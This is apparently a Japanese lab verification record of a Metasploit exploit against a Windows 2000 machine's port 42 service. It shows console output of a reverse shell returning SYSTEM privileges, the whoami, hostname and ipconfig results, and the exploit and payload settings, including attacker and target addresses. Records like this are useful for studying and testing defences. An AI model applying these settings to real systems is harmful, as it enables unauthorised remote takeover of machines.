[*] Starting Reverse Handler.
[*] Attempting to overwrite 0x053df4c4 with 0x053922e0 (0x05391f40)
[*] Got connection from 192.168.1.33:4321 <-> 192.168.1.250:1035
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM
C:\WINNT\system32>hostname
hostname
unknown-wp4dxhv
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter ローカル エリア接続:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.250
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
C:\WINNT\system32>
今回のExploitはMetasploitを使用しました。 この検証記録に使用した設定内容は以下の通りです。
Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ------------- ------------------ required RHOST 192.168.1.250 The target address required RPORT 42 The target port Payload: Name Default Description -------- -------- ------------ ------------------------------------------ required EXITFUNC process Exit technique: "process", "thread", "seh" required LHOST 192.168.1.33 Local address to receive connection required LPORT 4321 Local port to receive connection Target: Windows 2000 English